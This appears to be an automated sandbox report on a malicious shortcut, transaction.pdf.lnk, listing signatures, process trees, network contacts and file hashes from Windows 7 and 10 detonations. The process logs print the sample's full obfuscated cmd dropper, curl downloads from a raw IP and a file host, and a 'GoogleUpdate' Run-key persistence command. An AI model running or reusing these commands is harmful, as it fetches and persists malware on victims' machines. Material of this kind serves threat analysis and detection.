Malware Analysis Report

2025-06-16 00:41

Sample ID 241110-1z52cswejj
Target transaction.pdf.lnk
SHA256 d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb
Tags
execution persistence
score
8/10

Analysis Overview

score
8/10

SHA256

d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb

Threat Level: Likely malicious

The file transaction.pdf.lnk was found to be: Likely malicious.

Malicious Activity Summary

execution persistence

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Drops file in System32 directory

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 22:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 22:06

Reported

2024-11-10 22:09

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

Signatures

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/VORHPBAB/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""

C:\Windows\System32\cscript.exe

cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

MD5 88c7a65cabaeae2e10cbc7bd5608b28b
SHA1 d6ee96710a99d0f65a867c6082148ae7a4981227
SHA256 250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
SHA512 b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

C:\Users\Admin\AppData\Local\Temp\bat2.bat

MD5 8fa76d0dea5819256a19064f1639b35c
SHA1 8dd913107ed46e6df0babd1996c67a65909592b9
SHA256 b54a02a81debd9191d15efa77bb915b298f4e7ba1e12638e8fa7280dc8e5b16a
SHA512 468fb2dbf989657d9f0d1e39bb0a6213b5021b255c415a53bded8bc240eb49ae261e11c9904b481476dd9cc5f86e69338afd4fd953b46fb3bd294655d3533b48

memory/2964-46-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

memory/2964-47-0x0000000002760000-0x0000000002768000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 22:06

Reported

2024-11-10 22:09

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\cscript.exe | N/A
N/A | N/A | C:\Windows\system32\cscript.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\cscript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "wscript.exe C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\merge.ps1 KBKWGEBK" | C:\Windows\System32\reg.exe | N/A

Command and Scripting Interpreter: JavaScript

execution

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4916 wrote to memory of 4388 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\cmd.exe
PID 4916 wrote to memory of 4388 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 4616 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\cscript.exe
PID 4388 wrote to memory of 4616 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\cscript.exe
PID 4616 wrote to memory of 3160 | N/A | C:\Windows\System32\cscript.exe | C:\Windows\System32\cmd.exe
PID 4616 wrote to memory of 3160 | N/A | C:\Windows\System32\cscript.exe | C:\Windows\System32\cmd.exe
PID 3160 wrote to memory of 5096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 5096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 1748 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 1748 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 2192 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 2192 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 4088 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
PID 3160 wrote to memory of 4088 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
PID 4088 wrote to memory of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe | C:\Windows\System32\wscript.exe
PID 4088 wrote to memory of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe | C:\Windows\System32\wscript.exe
PID 2772 wrote to memory of 4264 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\cmd.exe
PID 2772 wrote to memory of 4264 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\cmd.exe
PID 4264 wrote to memory of 3248 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\wscript.exe
PID 4264 wrote to memory of 3248 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\wscript.exe
PID 3248 wrote to memory of 4932 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\cmd.exe
PID 3248 wrote to memory of 4932 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\cmd.exe
PID 4932 wrote to memory of 4816 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 4816 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4816 wrote to memory of 2376 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cscript.exe
PID 4816 wrote to memory of 2376 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cscript.exe
PID 4264 wrote to memory of 3616 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\wscript.exe
PID 4264 wrote to memory of 3616 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\wscript.exe
PID 3616 wrote to memory of 2328 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\cmd.exe
PID 3616 wrote to memory of 2328 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\cmd.exe
PID 2328 wrote to memory of 4500 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\reg.exe
PID 2328 wrote to memory of 4500 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/KBKWGEBK/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""

C:\Windows\System32\cscript.exe

cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat

C:\Windows\System32\curl.exe

curl -o C:\Users\Admin\AppData\Local\Temp\test.jpg https://drive.fileio.center/base1.jpg

C:\Windows\System32\curl.exe

curl -L -o C:\Users\Admin\AppData\Local\Temp\base.zip http://170.75.168.151/KBKWGEBK/aaa

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force

C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

C:\Windows\System32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1" KBKWGEBK & wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK & wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

C:\Windows\System32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK

C:\Windows\system32\cscript.exe

"C:\Windows\system32\cscript.exe" //nologo "C:\Users\Admin\AppData\Local\Microsoft\hello.js" KBKWGEBK

C:\Windows\System32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

C:\Windows\System32\reg.exe

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drive.fileio.center | udp
US | 172.67.201.111:443 | drive.fileio.center | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
GB | 142.250.187.227:80 | c.pki.goog | tcp
US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 111.201.67.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp
US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
CA | 170.75.168.151:80 | 170.75.168.151 | tcp
US | 8.8.8.8:53 | 151.168.75.170.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
RO | 65.38.121.211:80 | 65.38.121.211 | tcp
US | 8.8.8.8:53 | 211.121.38.65.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp
RO | 65.38.121.211:80 | 65.38.121.211 | tcp

Files

C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

MD5 88c7a65cabaeae2e10cbc7bd5608b28b
SHA1 d6ee96710a99d0f65a867c6082148ae7a4981227
SHA256 250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
SHA512 b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

C:\Users\Admin\AppData\Local\Temp\bat2.bat

MD5 aa350b1db128975bd16e8c2c7c4df7f1
SHA1 7be6d97138179f8676740a4e0cbb660736183397
SHA256 69d90278d0a0a757b0cc5fc04459d508edbd7e4a8eba6ae66a5fe84ca12af017
SHA512 65e523b8a29ac68fd9b2e3afe8825b7506335050769cd39dffb1deb11454b67515fa3cd0a96eb54016540dd2e0dbed87dbbfb6f4ed1f283289f04168108571f6

memory/2192-9-0x000002600D140000-0x000002600D162000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2f4cjrn.dvj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2192-19-0x0000026027C10000-0x0000026027C22000-memory.dmp

memory/2192-20-0x00000260256C0000-0x00000260256CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\base.zip

MD5 367a5951e81795113b8564546a8346c5
SHA1 f5dede6905ce2f0ca23a8f29052c6cbfc66da404
SHA256 4cf4e56b88e42327d3e0dfc48b99c05058df7f46d03dd08ed3295bb6b932ea77
SHA512 061a0d8e9f3f06d036237091f06c92794156ca253004b82b4ecaa89d48052ae120ea9134fd3532911997e4c038ab7a932fc601d75ea86a7309fb0e255e13f488

C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

MD5 db2fefe19f85e618f62686cf453df33c
SHA1 9a37897fb3e75074d451c87e5b3dd602545648a6
SHA256 67077124e4a881dba9e4c6e65c8bb45d5ab14a429959f935f933f5824596e463
SHA512 e4fb7dadd3ee954c0b46a95521a42cc076f77d75e9f3ce0ab68713a096b7a45b145723c27bb7d420c5cd5489d69867dc31175135a7efe397deab7bec43eab9c2

C:\Users\Admin\AppData\Local\Temp\dxgi.dll

MD5 83ce934c9273a1daf846ccd0186e1497
SHA1 4439cd1642e8af4f4b6f709bd69ea6afabb62d80
SHA256 bff92ebb960e6b5de169fe56e6ebd3862f7b0563ab38687c51d0e09d1bffc819
SHA512 c2a6e76f8ce3e6d6378a4becf59b441eeec3b0e4d18e20153a61d6757f10d33425801a3b899527e142bc53307cab26d56fcb0a8472485430e5802dbc7faeec0f

C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs

MD5 66837cd467d2e7fb879f7f8a8a7c32c9
SHA1 70367364b2a4ccf95dc39edb3df96cb0bddbce5b
SHA256 7904f5905e21ddb8ee0bcaa03e009683b0e5995d7b3b64a5d8fac3cea434eaf5
SHA512 8ed864277d19143bd9f073f56eff6720d882cdf7022e1ff996f17d4cb256ed59fee13fd0fe6bdce6c0a26bd45a322142d38fc473d3a6456bc9c211f709baf05a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 fe3aab3ae544a134b68e881b82b70169
SHA1 926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
SHA256 bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
SHA512 3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c0e79e67a9a209d37c9e3a9dd6437ab0
SHA1 ce94d8bb54f007e7536727606f8120688da83cd4
SHA256 7f07c943fdbd9ac658066c962b71b3d1f6f8b5d010b1c776c3eea7f3f737e0b0
SHA512 0fff8b276c0efb570e0bcc414c376a27efa2edefab1a0afb7e470a73fd4c47b57846454c145105f935d9e12b4fa50d297e54ea29b09010ccb3ed9d7d1148269d

C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1

MD5 f230b7afc89267a9766f3406cb5dbddf
SHA1 06797eb37d26eb18757db1daff2d381ab25566ab
SHA256 aa27582360eb94b77b942235e6fd1ea5d98fa73f447b8bdba818fcf5a40d09a4
SHA512 c2cc1ecd7a70d73fd6f6471a7bf6e45dd11b0698d6beaf65922550489f40233de1a5ddd2a572dff2eb17a1b767ac53f105f0e2e6bad26ccc8193973e914a949a

C:\Users\Admin\AppData\Local\Microsoft\text1

MD5 2c4ffae6bfebb1ee0035e1400034265d
SHA1 1f93c5cb3953f4a5927ab97eb1618f2c08c448a1
SHA256 2fb855f25db72aebe25885ddd1c983b8769944ede510cc658c7d1c6bdd5787c3
SHA512 860b4c29d06df1f07258f2b9ae7be5c9830d1bd7aa7ab827c823a6bc961739b6c358b8d5f1efe1b0df00eb398192a2f7495e14b19deafb535450ed72d1472aae

C:\Users\Admin\AppData\Local\Microsoft\text2

MD5 fc8b6f161d4f96d3d299400aa78914b7
SHA1 dbe374b617e289f945608254583fc405489f68a5
SHA256 bc995c4123c50cd55c83bf1d17815740aea9930863f82eb62936cc598769e46f
SHA512 00b76152598a52ec391484969828084ead6f56092c26b47d583b10618caffc930e52b9ea48d9c631cd733f85acad32434434b985719f09580f2eb87731198c9c

C:\Users\Admin\AppData\Local\Microsoft\text3

MD5 4c5b654dd985cb1757a4aa84545dc994
SHA1 0266eecac74bbb118780201100bcb8ec8aceef3c
SHA256 7639b5d13dcb7090099326b883095771a63cfb7ff0315dbd78ba6060e4ff7e99
SHA512 93615577bbccfc5d5328b016dfc5437bdbe19b354b245f760ded06b4165819ab8702de3876ae34b2d21376bdeab92ba6b74632c8a27038be06205417c068ecc0

C:\Users\Admin\AppData\Local\Microsoft\hello.js

MD5 d3764fea6416c62582aae6f79759c2be
SHA1 ffba6fe6ae16d9f1c191d462463a5aeec79eb5c7
SHA256 0528254a5933622320e8a3aafdcf4d6e0c3a5b49bac2ff49a7c8b61ecd51b3b0
SHA512 0da696218c879cda5917e3c81e050b62c83c0611d7825df36c3f971e4da63ecdfc66cc76338c00dbeec6de6c675004eaf2e9a7521580f932cbbc2838de2ceeac

memory/4088-57-0x00007FFCD3B50000-0x00007FFCD3C8D000-memory.dmp